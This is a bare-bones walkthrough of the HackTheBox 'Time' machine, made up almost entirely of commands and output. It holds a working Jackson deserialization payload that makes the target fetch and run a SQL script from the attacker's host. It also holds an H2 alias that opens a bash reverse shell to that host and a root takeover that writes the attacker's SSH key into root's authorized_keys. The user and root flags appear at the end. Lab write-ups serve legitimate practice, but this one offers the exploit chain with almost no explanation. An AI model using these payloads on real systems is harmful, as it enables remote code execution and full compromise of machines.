HackTheBox Time

$ nmap -sV -sC -Pn -oN 10.10.10.214 10.10.10.214

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'asdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdfdsfasdf...': was expecting ('true', 'false' or 'null')

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.138/inject.sql'"}]

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(">        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('/bin/bash -i >& /dev/tcp/10.10.14.138/1234 0>&1');

nc -lnvp 1234:

pericles@time:/home/pericles$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:c7:ce brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.214/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:c7ce/64 scope global dynamic mngtmpaddr
       valid_lft 86060sec preferred_lft 14060sec
    inet6 fe80::250:56ff:feb9:c7ce/64 scope link
       valid_lft forever preferred_lft forever
pericles@time:/home/pericles$ cat user.txt
ee56cb90323df2dd8918e74af9f1fa26

/usr/bin/timer_backup.sh

$ nano /usr/bin/timer_backup.sh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtRShyvgwXRSQCdJxVHSOmsvH1gbQMXAuUYSs0abix0cynMoPGfWCO9GE9nF6gSvcrvcu5L6aLnOFkot147K8uys3BCGRyeUpkdf+3ulecAHJCvMRymEr0dUzxu+1KTINPrxNtDOf7sLRPIr0pKql7Roi4LQ4SuFuB2Rm+LUaQvjSYbogt+gtEYEOHlfetJC/4XthYcmFi4jQdA9DEva07LIlmIsr/CmtLFZ40/zSKcv88OFXAUW86+82KOR/LcV65TDQ4uXyF72d6R5pmXods7EP3WqdFxsIHq0rGPJPitSSIGzWsYF0k5NdN4i+990OBUi3dHaFHy9F6TVLPR7tQMj6zaSBp4gPnCCsFebLnfuv3tN4gOL7CS21bJS7HYaTa3ApGN+onUyCn7NK0JXpNpm9YUu43IVwNRA6Z6E20hVfbxhEYQLB1PhhfF6DPQ/b4NI8fch1zGV3uL0qK8XL7K8zKsYOgWTffmH2s/kh724HuI2jUxBiJ3RH171cRxnU= kali@kalihackthebox" > /root/.ssh/authorized_keys

ssh [email protected]

root@time:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:c7:ce brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.214/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:c7ce/64 scope global dynamic mngtmpaddr
       valid_lft 86286sec preferred_lft 14286sec
    inet6 fe80::250:56ff:feb9:c7ce/64 scope link
       valid_lft forever preferred_lft forever
root@time:~# cat root.txt
dfb888b09df82c72f0c74b0377858c9f